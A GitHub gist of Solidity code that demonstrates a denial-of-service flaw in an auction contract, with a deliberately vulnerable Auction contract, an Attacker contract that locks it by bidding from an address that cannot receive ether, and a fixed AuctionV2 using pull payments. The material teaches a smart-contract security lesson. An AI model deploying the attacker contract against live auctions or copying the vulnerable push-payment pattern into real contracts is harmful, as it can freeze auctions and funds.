Created
September 6, 2022 09:18
-
-
Save ViktorKuzmanov/a79e6f1f4ee647f43a297716a7d0e7c2 to your computer and use it in GitHub Desktop.
Perform DOS Attack. Auction is contract vunerable to DOS attack and AuctionV2 solves this by using pull over push pattern
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
contract Auction { | |
address payable public currentLeader; | |
uint public highestBid; | |
function bid() public payable { | |
require(msg.value > highestBid); | |
bool success = currentLeader.send(highestBid); | |
require(success); | |
currentLeader = payable(msg.sender); | |
highestBid = msg.value; | |
} | |
} | |
contract Attacker { | |
Auction public immutable externalContract; | |
constructor(address externalContractAddress) { | |
externalContract = Auction(externalContractAddress); | |
} | |
function attack() public payable { | |
externalContract.bid { value: msg.value }(); | |
} | |
// receive() external payable {} | |
} | |
contract AuctionV2 { | |
address payable public currentLeader; | |
uint public highestBid; | |
mapping(address => uint) public balances; | |
function bid() public payable { | |
require(msg.value > highestBid); | |
// Instead of sending ether to address (pushing) we do pulling | |
balances[currentLeader] += highestBid; | |
currentLeader = payable(msg.sender); | |
highestBid = msg.value; | |
} | |
function withdraw() public { | |
require(msg.sender != currentLeader, "Current king cannot withdraw"); | |
uint amount = balances[msg.sender]; | |
balances[msg.sender] = 0; | |
(bool sent, ) = msg.sender.call{value: amount}(""); | |
require(sent, "Failed to send Ether"); | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment